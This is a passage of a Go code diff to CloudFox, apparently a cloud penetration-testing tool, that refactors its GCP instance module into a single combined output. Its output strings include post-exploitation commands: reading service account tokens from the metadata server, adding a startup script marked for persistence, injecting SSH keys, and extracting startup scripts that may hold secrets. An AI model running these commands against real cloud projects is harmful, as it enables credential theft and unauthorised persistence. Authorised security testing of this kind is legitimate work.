e.IdentityType, - e.Domain, - m.GetProjectName(e.ProjectID), - e.ProjectID, - e.RiskLevel, - truncateString(e.Details, 40), - }) - } - - // Risk Summary table - summaryHeader := []string{ - "Risk Type", - "Severity", - "Affected", - "Description", - } - - var summaryBody [][]string - for _, r := range m.IdentityRisks { - summaryBody = append(summaryBody, []string{ - r.RiskType, - r.Severity, - fmt.Sprintf("%d", r.AffectedCount), - truncateString(r.Description, 50), - }) - } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - // Build tables - tables := []internal.TableFile{} - - if len(bindingsBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "risky-bindings", - Header: bindingsHeader, - Body: bindingsBody, - }) - } - - if len(saRisksBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "service-account-risks", - Header: saRisksHeader, - Body: saRisksBody, - }) - } - - if len(externalBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "external-identities", - Header: externalHeader, - Body: externalBody, - }) - } - - if len(summaryBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "identity-risks", - Header: summaryHeader, - Body: summaryBody, - }) - } - - output := IdentityProtectionOutput{ - Table: tables, - Loot: lootFiles, - } - - // Build scope names using project names - scopeNames := make([]string, len(m.ProjectIDs)) - for i, projectID := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(projectID) - } - - // Write output - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - scopeNames, - m.ProjectIDs, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_IDENTITYPROTECTION_MODULE_NAME) - m.CommandCounter.Error++ - } -} diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index a875db79..af9d81b6 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -15,7 +15,7 @@ import ( var GCPInstancesCommand = &cobra.Command{ Use: globals.GCP_INSTANCES_MODULE_NAME, - Aliases: []string{"vms", "compute"}, + Aliases: []string{"vms", "compute", "ssh", "oslogin"}, Short: "Enumerate GCP Compute Engine instances with security configuration", Long: `Enumerate GCP Compute Engine instances across projects with security-relevant details. @@ -24,21 +24,24 @@ Features: - Shows attached service accounts and their scopes - Identifies instances with default service accounts or broad scopes - Shows Shielded VM, Secure Boot, and Confidential VM status -- Shows OS Login and serial port configuration -- Shows disk encryption type (Google-managed vs CMEK/CSEK) -- Generates gcloud commands for instance access -- Generates exploitation commands (SSH, serial console, metadata) +- Shows OS Login configuration (enabled, 2FA, block project keys) +- Shows serial port and disk encryption configuration +- Extracts SSH keys from project and instance metadata +- Extracts startup scripts (may contain secrets) +- Generates gcloud commands for instance access and exploitation Security Columns: - ExternalIP: Instances with external IPs are internet-accessible - DefaultSA: Uses default compute service account (security risk) - BroadScopes: Has cloud-platform or other broad OAuth scopes -- CanIPForward: Can forward packets (potential for lateral movement) - OSLogin: OS Login enabled (recommended for access control) +- OSLogin2FA: OS Login with 2FA required +- BlockProjKeys: Instance blocks project-wide SSH keys - SerialPort: Serial port access enabled (security risk if exposed) -- ShieldedVM: Shielded VM features enabled -- SecureBoot: Secure Boot enabled (prevents rootkits) -- Encryption: Boot disk encryption type`, +- CanIPForward: Can forward packets (potential for lateral movement) +- ShieldedVM/SecureBoot/vTPM/Integrity: Hardware security features +- Confidential: Confidential computing enabled +- Encryption: Boot disk encryption type (Google-managed, CMEK, CSEK)`, Run: runGCPInstancesCommand, } @@ -151,54 +154,9 @@ func (m *InstancesModule) processProject(ctx context.Context, projectID string, // Loot File Management // ------------------------------ func (m *InstancesModule) initializeLootFiles() { - m.LootMap["instances-gcloud-commands"] = &internal.LootFile{ - Name: "instances-gcloud-commands", - Contents: "# GCP Compute Engine Instance Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["instances-ssh-commands"] = &internal.LootFile{ - Name: "instances-ssh-commands", - Contents: "# GCP Instance SSH Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["instances-exploitation"] = &internal.LootFile{ - Name: "instances-exploitation", - Contents: "# GCP Instance Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["instances-metadata"] = &internal.LootFile{ - Name: "instances-metadata", - Contents: "# GCP Instance Metadata Access Commands\n# Generated by CloudFox\n\n", - } - // New pentest-focused loot files - m.LootMap["instances-startup-scripts"] = &internal.LootFile{ - Name: "instances-startup-scripts", - Contents: "# GCP Instance Startup Scripts\n# Generated by CloudFox\n# May contain credentials, API keys, or sensitive configuration\n\n", - } - m.LootMap["instances-ssh-keys"] = &internal.LootFile{ - Name: "instances-ssh-keys", - Contents: "# GCP Instance SSH Keys\n# Generated by CloudFox\n# Format: user:key-type KEY comment\n\n", - } - m.LootMap["instances-project-metadata"] = &internal.LootFile{ - Name: "instances-project-metadata", - Contents: "# GCP Project-Level Metadata\n# Generated by CloudFox\n# SSH keys here apply to ALL instances (unless blocked)\n\n", - } - m.LootMap["instances-custom-metadata"] = &internal.LootFile{ - Name: "instances-custom-metadata", - Contents: "# GCP Custom Metadata Keys\n# Generated by CloudFox\n# These may contain secrets, API keys, or sensitive config\n\n", - } - m.LootMap["instances-no-shielded-vm"] = &internal.LootFile{ - Name: "instances-no-shielded-vm", - Contents: "# Instances WITHOUT Shielded VM\n# Generated by CloudFox\n# These instances lack boot integrity verification\n\n", - } - m.LootMap["instances-google-managed-encryption"] = &internal.LootFile{ - Name: "instances-google-managed-encryption", - Contents: "# Instances Using Google-Managed Encryption\n# Generated by CloudFox\n# Consider CMEK for compliance requirements\n\n", - } - m.LootMap["instances-confidential-vm"] = &internal.LootFile{ - Name: "instances-confidential-vm", - Contents: "# Confidential VM Instances\n# Generated by CloudFox\n# These instances use encrypted memory\n\n", - } - m.LootMap["instances-security-recommendations"] = &internal.LootFile{ - Name: "instances-security-recommendations", - Contents: "# Compute Engine Security Recommendations\n# Generated by CloudFox\n# Remediation commands for security issues\n\n", + m.LootMap["instances-commands"] = &internal.LootFile{ + Name: "instances-commands", + Contents: "# GCP Compute Engine Instance Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } @@ -207,68 +165,48 @@ func (m *InstancesModule) addProjectMetadataToLoot(meta *ComputeEngineService.Pr return } + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# PROJECT-LEVEL METADATA (Project: %s)\n"+ + "# ==========================================\n"+ + "# OS Login: %v, OS Login 2FA: %v, Serial Port: %v\n", + meta.ProjectID, meta.OSLoginEnabled, meta.OSLogin2FAEnabled, meta.SerialPortEnabled, + ) + // Project-level SSH keys if meta.HasProjectSSHKeys && len(meta.ProjectSSHKeys) > 0 { - m.LootMap["instances-project-metadata"].Contents += fmt.Sprintf( - "## Project: %s\n"+ - "## Project-level SSH Keys (apply to all instances unless blocked):\n"+ - "## OS Login: %v, OS Login 2FA: %v\n", - meta.ProjectID, meta.OSLoginEnabled, meta.OSLogin2FAEnabled, + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# Project SSH Keys: %d (apply to ALL instances not blocking project keys)\n", + len(meta.ProjectSSHKeys), ) for _, key := range meta.ProjectSSHKeys { - m.LootMap["instances-project-metadata"].Contents += key + "\n" + m.LootMap["instances-commands"].Contents += fmt.Sprintf("# %s\n", key) } - m.LootMap["instances-project-metadata"].Contents += "\n" - - // Also add to SSH keys loot - m.LootMap["instances-ssh-keys"].Contents += fmt.Sprintf( - "## PROJECT-LEVEL SSH KEYS (Project: %s)\n"+ - "## These apply to ALL instances that don't block project SSH keys\n", - meta.ProjectID, - ) - for _, key := range meta.ProjectSSHKeys { - m.LootMap["instances-ssh-keys"].Contents += key + "\n" - } - m.LootMap["instances-ssh-keys"].Contents += "\n" } // Project-level startup script if meta.HasProjectStartupScript && meta.ProjectStartupScript != "" { - m.LootMap["instances-startup-scripts"].Contents += fmt.Sprintf( - "## PROJECT-LEVEL STARTUP SCRIPT (Project: %s)\n"+ - "## This runs on ALL instances in the project\n"+ - "## ------- PROJECT STARTUP SCRIPT BEGIN -------\n"+ + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "#\n# PROJECT STARTUP SCRIPT (runs on ALL instances):\n"+ + "# ------- BEGIN -------\n"+ "%s\n"+ - "## ------- PROJECT STARTUP SCRIPT END -------\n\n", - meta.ProjectID, meta.ProjectStartupScript, + "# ------- END -------\n", + meta.ProjectStartupScript, ) } // Custom metadata keys at project level if len(meta.CustomMetadataKeys) > 0 { - m.LootMap["instances-custom-metadata"].Contents += fmt.Sprintf( - "## PROJECT-LEVEL CUSTOM METADATA (Project: %s)\n"+ - "## These may contain secrets, API keys, or sensitive config\n"+ - "## Custom keys found:\n", - meta.ProjectID, - ) + m.LootMap["instances-commands"].Contents += "# Custom metadata keys (may contain secrets):\n" for _, key := range meta.CustomMetadataKeys { - m.LootMap["instances-custom-metadata"].Contents += fmt.Sprintf("## - %s\n", key) + m.LootMap["instances-commands"].Contents += fmt.Sprintf("# - %s\n", key) } - m.LootMap["instances-custom-metadata"].Contents += fmt.Sprintf( - "# Retrieve all project metadata with:\n"+ - "gcloud compute project-info describe --project=%s --format='yaml(commonInstanceMetadata)'\n\n", - meta.ProjectID, - ) } - // Project-level security settings - m.LootMap["instances-project-metadata"].Contents += fmt.Sprintf( - "## Project: %s Security Settings\n"+ - "## OS Login Enabled: %v\n"+ - "## OS Login 2FA Enabled: %v\n"+ - "## Serial Port Enabled: %v\n\n", - meta.ProjectID, meta.OSLoginEnabled, meta.OSLogin2FAEnabled, meta.SerialPortEnabled, + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "\n# Get project metadata:\n"+ + "gcloud compute project-info describe --project=%s --format='yaml(commonInstanceMetadata)'\n\n", + meta.ProjectID, ) } @@ -279,290 +217,121 @@ func (m *InstancesModule) addInstanceToLoot(instance ComputeEngineService.Comput saEmails = append(saEmails, sa.Email) } saString := strings.Join(saEmails, ", ") - - // Build security flags string - var securityFlags []string - if instance.HasDefaultSA { - securityFlags = append(securityFlags, "DEFAULT_SA") + if saString == "" { + saString = "-" } - if instance.HasCloudScopes { - securityFlags = append(securityFlags, "BROAD_SCOPES") + + // External IP for display + externalIP := instance.ExternalIP + if externalIP == "" { + externalIP = "None" } - if instance.ExternalIP != "" { - securityFlags = append(securityFlags, "EXTERNAL_IP") + + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# INSTANCE: %s (Project: %s, Zone: %s)\n"+ + "# ==========================================\n"+ + "# State: %s, Machine Type: %s\n"+ + "# External IP: %s, Internal IP: %s\n"+ + "# Service Account: %s\n"+ + "# Default SA: %v, Broad Scopes: %v\n"+ + "# OS Login: %v, OS Login 2FA: %v, Block Project Keys: %v\n"+ + "# Serial Port: %v, Shielded VM: %v, Secure Boot: %v\n", + instance.Name, instance.ProjectID, instance.Zone, + instance.State, instance.MachineType, + externalIP, instance.InternalIP, + saString, + instance.HasDefaultSA, instance.HasCloudScopes, + instance.OSLoginEnabled, instance.OSLogin2FAEnabled, instance.BlockProjectSSHKeys, + instance.SerialPortEnabled, instance.ShieldedVM, instance.SecureBoot, + ) + + // SSH keys on this instance + if len(instance.SSHKeys) > 0 { + m.LootMap["instances-commands"].Contents += fmt.Sprintf("# Instance SSH Keys: %d\n", len(instance.SSHKeys)) + for _, key := range instance.SSHKeys { + m.LootMap["instances-commands"].Contents += fmt.Sprintf("# %s\n", key) + } } - if instance.SerialPortEnabled { - securityFlags = append(securityFlags, "SERIAL_PORT") + + // Startup script content + if instance.StartupScriptContent != "" { + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "#\n# STARTUP SCRIPT (may contain secrets):\n"+ + "# ------- BEGIN -------\n"+ + "%s\n"+ + "# ------- END -------\n", + instance.StartupScriptContent, + ) } - if !instance.OSLoginEnabled { - securityFlags = append(securityFlags, "NO_OSLOGIN") + if instance.StartupScriptURL != "" { + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# Startup Script URL: %s\n"+ + "# Fetch with: gsutil cat %s\n", + instance.StartupScriptURL, instance.StartupScriptURL, + ) } - securityString := strings.Join(securityFlags, ", ") - if securityString == "" { - securityString = "None" + + // Custom metadata keys + if len(instance.CustomMetadata) > 0 { + m.LootMap["instances-commands"].Contents += "# Custom metadata keys (may contain secrets):\n" + for _, key := range instance.CustomMetadata { + m.LootMap["instances-commands"].Contents += fmt.Sprintf("# - %s\n", key) + } } - // gcloud commands for enumeration - m.LootMap["instances-gcloud-commands"].Contents += fmt.Sprintf( - "# Instance: %s (Project: %s, Zone: %s)\n"+ - "# Service Accounts: %s\n"+ - "# Security Flags: %s\n"+ + // Commands section + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "\n# Describe instance:\n"+ "gcloud compute instances describe %s --zone=%s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud compute instances get-iam-policy %s --zone=%s --project=%s\n"+ + "# Get serial port output:\n"+ "gcloud compute instances get-serial-port-output %s --zone=%s --project=%s\n"+ - "gcloud compute instances get-iam-policy %s --zone=%s --project=%s\n\n", - instance.Name, instance.ProjectID, instance.Zone, saString, securityString, + "# Get metadata:\n"+ + "gcloud compute instances describe %s --zone=%s --project=%s --format='yaml(metadata)'\n", + instance.Name, instance.Zone, instance.ProjectID, instance.Name, instance.Zone, instance.ProjectID, instance.Name, instance.Zone, instance.ProjectID, instance.Name, instance.Zone, instance.ProjectID, ) - // SSH commands (if external IP exists) + // SSH commands if instance.ExternalIP != "" { - m.LootMap["instances-ssh-commands"].Contents += fmt.Sprintf( - "# Instance: %s (External IP: %s)\n"+ - "# OS Login: %v, Serial Port: %v\n"+ + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# SSH (external IP):\n"+ "gcloud compute ssh %s --zone=%s --project=%s\n"+ "# Direct SSH (if OS Login disabled):\n"+ - "ssh -i @%s\n\n", - instance.Name, instance.ExternalIP, instance.OSLoginEnabled, instance.SerialPortEnabled, + "ssh -i ~/.ssh/google_compute_engine @%s\n", instance.Name, instance.Zone, instance.ProjectID, instance.ExternalIP, ) } else { - m.LootMap["instances-ssh-commands"].Contents += fmt.Sprintf( - "# Instance: %s (Internal IP: %s, No external IP)\n"+ - "# OS Login: %v\n"+ - "# Use IAP tunnel:\n"+ - "gcloud compute ssh %s --zone=%s --project=%s --tunnel-through-iap\n\n", - instance.Name, instance.InternalIP, instance.OSLoginEnabled, + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# SSH via IAP tunnel (no external IP):\n"+ + "gcloud compute ssh %s --zone=%s --project=%s --tunnel-through-iap\n", instance.Name, instance.Zone, instance.ProjectID, ) } // Exploitation commands - m.LootMap["instances-exploitation"].Contents += fmt.Sprintf( - "# Instance: %s (State: %s)\n"+ - "# Service Account: %s\n"+ - "# Default SA: %v, Broad Scopes: %v\n"+ - "# Get instance metadata (from inside the instance):\n"+ + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# Metadata from inside instance:\n"+ "curl -H \"Metadata-Flavor: Google\" http://169.254.169.254/computeMetadata/v1/?recursive=true\n"+ "# Get service account token:\n"+ "curl -H \"Metadata-Flavor: Google\" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token\n"+ - "# Run command via startup script:\n"+ + "# Add startup script (persistence):\n"+ "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'\n"+ - "# Reset SSH keys:\n"+ + "# Add SSH keys:\n"+ "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata-from-file=ssh-keys=\n\n", - instance.Name, instance.State, saString, instance.HasDefaultSA, instance.HasCloudScopes, instance.Name, instance.Zone, instance.ProjectID, instance.Name, instance.Zone, instance.ProjectID, ) - - // Metadata access commands - m.LootMap["instances-metadata"].Contents += fmt.Sprintf( - "# Instance: %s\n"+ - "# Has Startup Script: %v, Has SSH Keys: %v\n"+ - "# Block Project SSH Keys: %v\n"+ - "# Get instance metadata:\n"+ - "gcloud compute instances describe %s --zone=%s --project=%s --format='yaml(metadata)'\n"+ - "# Get custom metadata (startup scripts, SSH keys, etc):\n"+ - "gcloud compute project-info describe --project=%s --format='yaml(commonInstanceMetadata)'\n\n", - instance.Name, instance.HasStartupScript, instance.HasSSHKeys, instance.BlockProjectSSHKeys, - instance.Name, instance.Zone, instance.ProjectID, - instance.ProjectID, - ) - - // Pentest: Extract startup scripts - if instance.StartupScriptContent != "" { - m.LootMap["instances-startup-scripts"].Contents += fmt.Sprintf( - "## Instance: %s (Project: %s, Zone: %s)\n"+ - "## Service Account: %s\n"+ - "## ------- STARTUP SCRIPT BEGIN -------\n"+ - "%s\n"+ - "## ------- STARTUP SCRIPT END -------\n\n", - instance.Name, instance.ProjectID, instance.Zone, saString, - instance.StartupScriptContent, - ) - } - if instance.StartupScriptURL != "" { - m.LootMap["instances-startup-scripts"].Contents += fmt.Sprintf( - "## Instance: %s (Project: %s, Zone: %s)\n"+ - "## Startup Script URL (fetch separately):\n"+ - "## %s\n"+ - "# Fetch with: gsutil cat %s\n\n", - instance.Name, instance.ProjectID, instance.Zone, - instance.StartupScriptURL, - instance.StartupScriptURL, - ) - } - - // Pentest: Extract SSH keys - if len(instance.SSHKeys) > 0 { - m.LootMap["instances-ssh-keys"].Contents += fmt.Sprintf( - "## Instance: %s (Project: %s, Zone: %s)\n"+ - "## Block Project SSH Keys: %v\n", - instance.Name, instance.ProjectID, instance.Zone, instance.BlockProjectSSHKeys, - ) - for _, key := range instance.SSHKeys { - m.LootMap["instances-ssh-keys"].Contents += key + "\n" - } - m.LootMap["instances-ssh-keys"].Contents += "\n" - } - - // Pentest: Custom metadata keys (may contain secrets) - if len(instance.CustomMetadata) > 0 { - m.LootMap["instances-custom-metadata"].Contents += fmt.Sprintf( - "## Instance: %s (Project: %s, Zone: %s)\n"+ - "## Custom metadata keys found:\n", - instance.Name, instance.ProjectID, instance.Zone, - ) - for _, key := range instance.CustomMetadata { - m.LootMap["instances-custom-metadata"].Contents += fmt.Sprintf("## - %s\n", key) - } - m.LootMap["instances-custom-metadata"].Contents += fmt.Sprintf( - "# Retrieve values with:\n"+ - "gcloud compute instances describe %s --zone=%s --project=%s --format='yaml(metadata.items)'\n\n", - instance.Name, instance.Zone, instance.ProjectID, - ) - } - - // Shielded VM status - if !instance.ShieldedVM { - m.LootMap["instances-no-shielded-vm"].Contents += fmt.Sprintf( - "# INSTANCE: %s (Project: %s, Zone: %s)\n"+ - "# Secure Boot: %v, vTPM: %v, Integrity Monitoring: %v\n"+ - "# Enable Shielded VM with:\n"+ - "gcloud compute instances update %s \\\n"+ - " --zone=%s \\\n"+ - " --shielded-secure-boot \\\n"+ - " --shielded-vtpm \\\n"+ - " --shielded-integrity-monitoring \\\n"+ - " --project=%s\n\n", - instance.Name, instance.ProjectID, instance.Zone, - instance.SecureBoot, instance.VTPMEnabled, instance.IntegrityMonitoring, - instance.Name, instance.Zone, instance.ProjectID, - ) - } - - // Encryption status - if instance.BootDiskEncryption == "Google-managed" || instance.BootDiskEncryption == "" { - m.LootMap["instances-google-managed-encryption"].Contents += fmt.Sprintf( - "# INSTANCE: %s (Project: %s, Zone: %s)\n"+ - "# Boot Disk Encryption: Google-managed\n"+ - "# NOTE: Cannot change encryption on existing disks.\n"+ - "# For CMEK, create a new disk with:\n"+ - "# gcloud compute disks create %s-cmek \\\n"+ - "# --kms-key=projects/PROJECT/locations/LOCATION/keyRings/RING/cryptoKeys/KEY \\\n"+ - "# --zone=%s --project=%s\n\n", - instance.Name, instance.ProjectID, instance.Zone, - instance.Name, instance.Zone, instance.ProjectID, - ) - } - - // Confidential VM - if instance.ConfidentialVM { - m.LootMap["instances-confidential-vm"].Contents += fmt.Sprintf( - "# INSTANCE: %s (Project: %s, Zone: %s)\n"+ - "# Confidential Computing: ENABLED\n"+ - "# Memory is encrypted with AMD SEV/SEV-SNP\n"+ - "# Machine Type: %s\n\n", - instance.Name, instance.ProjectID, instance.Zone, instance.MachineType, - ) - } - - // Security recommendations - m.addInstanceSecurityRecommendations(instance) -} - -// addInstanceSecurityRecommendations adds remediation commands for instance security issues -func (m *InstancesModule) addInstanceSecurityRecommendations(instance ComputeEngineService.ComputeEngineInfo) { - hasRecommendations := false - recommendations := fmt.Sprintf( - "# INSTANCE: %s (Project: %s, Zone: %s)\n", - instance.Name, instance.ProjectID, instance.Zone, - ) - - // No Shielded VM - if !instance.ShieldedVM { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Shielded VM not enabled\n"+ - "gcloud compute instances update %s \\\n"+ - " --zone=%s \\\n"+ - " --shielded-secure-boot \\\n"+ - " --shielded-vtpm \\\n"+ - " --shielded-integrity-monitoring \\\n"+ - " --project=%s\n\n", - instance.Name, instance.Zone, instance.ProjectID, - ) - } - - // OS Login not enabled with external IP - if instance.ExternalIP != "" && !instance.OSLoginEnabled { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: External IP without OS Login\n"+ - "gcloud compute instances add-metadata %s \\\n"+ - " --zone=%s \\\n"+ - " --metadata enable-oslogin=TRUE \\\n"+ - " --project=%s\n\n", - instance.Name, instance.Zone, instance.ProjectID, - ) - } - - // Serial port enabled - if instance.SerialPortEnabled { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Serial port access enabled\n"+ - "gcloud compute instances add-metadata %s \\\n"+ - " --zone=%s \\\n"+ - " --metadata serial-port-enable=FALSE \\\n"+ - " --project=%s\n\n", - instance.Name, instance.Zone, instance.ProjectID, - ) - } - - // Default service account - if instance.HasDefaultSA { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Using default service account\n"+ - "# Create a custom service account with minimal permissions\n"+ - "# gcloud iam service-accounts create %s-sa --display-name='%s SA'\n"+ - "# gcloud compute instances set-service-account %s \\\n"+ - "# --zone=%s \\\n"+ - "# --service-account=%s-sa@%s.iam.gserviceaccount.com \\\n"+ - "# --scopes=cloud-platform \\\n"+ - "# --project=%s\n\n", - instance.Name, instance.Name, - instance.Name, instance.Zone, - instance.Name, instance.ProjectID, - instance.ProjectID, - ) - } - - // Broad scopes - if instance.HasCloudScopes { - hasRecommendations = true - recommendations += "# Issue: Has broad OAuth scopes (cloud-platform)\n" + - "# Recommend: Use specific scopes or Workload Identity\n" + - "# See: https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam\n\n" - } - - if hasRecommendations { - m.LootMap["instances-security-recommendations"].Contents += recommendations + "\n" - } } // ------------------------------ // Helper Functions // ------------------------------ -func instanceBoolToCheck(b bool) string { - if b { - return "✓" - } - return "-" -} // SSHKeyParts contains parsed SSH key components type SSHKeyParts struct { @@ -612,35 +381,44 @@ func parseSSHKeyLine(line string) SSHKeyParts { // Output Generation // ------------------------------ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main table with security-relevant columns + // Single combined table with all security-relevant columns and IAM bindings header := []string{ "Project Name", "Project ID", "Name", "Zone", "State", + "Machine Type", "External IP", "Internal IP", "Service Account", - "DefaultSA", - "BroadScopes", - "OSLogin", - "SerialPort", - "ShieldedVM", - "SecureBoot", + "Scopes", + "Default SA", + "Broad Scopes", + "OS Login", + "OS Login 2FA", + "Block Proj Keys", + "Serial Port", + "IP Forward", + "Shielded VM", + "Secure Boot", + "vTPM", + "Integrity", + "Confidential", "Encryption", + "KMS Key", + "IAM Role", + "IAM Member", } var body [][]string for _, instance := range m.Instances { // Get first service account email (most instances have just one) saEmail := "-" + scopes := "-" if len(instance.ServiceAccounts) > 0 { saEmail = instance.ServiceAccounts[0].Email - // Shorten default SA for display - if strings.Contains(saEmail, "-compute@developer.gserviceaccount.com") { - saEmail = "default-compute-sa" - } + scopes = ComputeEngineService.FormatScopes(instance.ServiceAccounts[0].Scopes) } // External IP display @@ -649,258 +427,70 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge externalIP = "-" } - body = append(body, []string{ + // Encryption display + encryption := instance.BootDiskEncryption + if encryption == "" { + encryption = "Google" + } + + // KMS Key display + kmsKey := instance.BootDiskKMSKey + if kmsKey == "" { + kmsKey = "-" + } + + // Base row data (reused for each IAM binding) + baseRow := []string{ m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Name, instance.Zone, instance.State, + instance.MachineType, externalIP, instance.InternalIP, saEmail, - instanceBoolToCheck(instance.HasDefaultSA), - instanceBoolToCheck(instance.HasCloudScopes), - instanceBoolToCheck(instance.OSLoginEnabled), - instanceBoolToCheck(instance.SerialPortEnabled), - instanceBoolToCheck(instance.ShieldedVM), - instanceBoolToCheck(instance.SecureBoot), - instance.BootDiskEncryption, - }) - } - - // Detailed service account table - shows full SA info with scopes - saHeader := []string{ - "Instance", - "Project Name", - "Project ID", - "Zone", - "Service Account", - "Default SA", - "Scopes", - } - - var saBody [][]string - for _, instance := range m.Instances { - for _, sa := range instance.ServiceAccounts { - isDefault := "-" - if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") { - isDefault = "✓" - } - - // Format scopes (shorten URLs) - scopes := ComputeEngineService.FormatScopes(sa.Scopes) - - saBody = append(saBody, []string{ - instance.Name, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - instance.Zone, - sa.Email, - isDefault, - scopes, - }) - } - } - - // Security findings table - highlight risky configurations - findingsHeader := []string{ - "Instance", - "Project Name", - "Project ID", - "Zone", - "Finding", - "Severity", - "Details", - } - - var findingsBody [][]string - for _, instance := range m.Instances { - // Check for security issues - if instance.HasDefaultSA { - findingsBody = append(findingsBody, []string{ - instance.Name, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - instance.Zone, - "Default Service Account", - "MEDIUM", - "Using default compute service account - consider using a custom SA", - }) - } - if instance.HasCloudScopes { - findingsBody = append(findingsBody, []string{ - instance.Name, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - instance.Zone, - "Broad OAuth Scopes", - "HIGH", - "Has cloud-platform or other broad scopes - potential for privilege escalation", - }) - } - if instance.ExternalIP != "" && !instance.OSLoginEnabled { - findingsBody = append(findingsBody, []string{ - instance.Name, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - instance.Zone, - "External IP without OS Login", - "MEDIUM", - fmt.Sprintf("External IP %s exposed without OS Login enabled", instance.ExternalIP), - }) - } - if instance.SerialPortEnabled { - findingsBody = append(findingsBody, []string{ - instance.Name, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - instance.Zone, - "Serial Port Enabled", - "LOW", - "Serial port access enabled - potential for console access", - }) - } - if instance.CanIPForward { - findingsBody = append(findingsBody, []string{ - instance.Name, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - instance.Zone, - "IP Forwarding Enabled", - "INFO", - "Can forward packets - may be intentional for NAT/routing", - }) - } - if !instance.ShieldedVM { - findingsBody = append(findingsBody, []string{ - instance.Name, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - instance.Zone, - "Shielded VM Disabled", - "LOW", - "Shielded VM not enabled - consider enabling for security", - }) - } - if instance.HasStartupScript && instance.HasDefaultSA && instance.HasCloudScopes { - findingsBody = append(findingsBody, []string{ - instance.Name, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - instance.Zone, - "Startup Script with Broad Access", - "HIGH", - "Has startup script with default SA and broad scopes - potential for code execution", - }) + scopes, + boolToYesNo(instance.HasDefaultSA), + boolToYesNo(instance.HasCloudScopes), + boolToYesNo(instance.OSLoginEnabled), + boolToYesNo(instance.OSLogin2FAEnabled), + boolToYesNo(instance.BlockProjectSSHKeys), + boolToYesNo(instance.SerialPortEnabled), + boolToYesNo(instance.CanIPForward), + boolToYesNo(instance.ShieldedVM), + boolToYesNo(instance.SecureBoot), + boolToYesNo(instance.VTPMEnabled), + boolToYesNo(instance.IntegrityMonitoring), + boolToYesNo(instance.ConfidentialVM), + encryption, + kmsKey, } - } - // Startup scripts table (pentest-focused) - startupHeader := []string{ - "Instance", - "Project Name", - "Project ID", - "Zone", - "Script Type", - "Service Account", - "Content Preview", - } - - var startupBody [][]string - for _, instance := range m.Instances { - if instance.StartupScriptContent != "" { - // Preview first 100 chars - preview := instance.StartupScriptContent - if len(preview) > 100 { - preview = preview[:100] + "..." - } - // Replace newlines for table display - preview = strings.ReplaceAll(preview, "\n", "\\n") - - saEmail := "-" - if len(instance.ServiceAccounts) > 0 { - saEmail = instance.ServiceAccounts[0].Email - } - - startupBody = append(startupBody, []string{ - instance.Name, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - instance.Zone, - "Inline", - saEmail, - preview, - }) - } - if instance.StartupScriptURL != "" { - saEmail := "-" - if len(instance.ServiceAccounts) > 0 { - saEmail = instance.ServiceAccounts[0].Email + // If instance has IAM bindings, create one row per binding + if len(instance.IAMBindings) > 0 { + for _, binding := range instance.IAMBindings { + row := make([]string, len(baseRow)+2) + copy(row, baseRow) + row[len(baseRow)] = binding.Role + row[len(baseRow)+1] = binding.Member + body = append(body, row) } - - startupBody = append(startupBody, []string{ - instance.Name, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - instance.Zone, - "URL", - saEmail, - instance.StartupScriptURL, - }) - } - } - - // Security configuration table - securityConfigHeader := []string{ - "Instance", - "Project Name", - "Project ID", - "Zone", - "ShieldedVM", - "SecureBoot", - "vTPM", - "Integrity", - "Confidential", - "Encryption", - "KMS Key", - } - - var securityConfigBody [][]string - for _, instance := range m.Instances { - kmsKey := instance.BootDiskKMSKey - if kmsKey == "" { - kmsKey = "-" } else { - // Truncate long key names - parts := strings.Split(kmsKey, "/") - if len(parts) > 0 { - kmsKey = 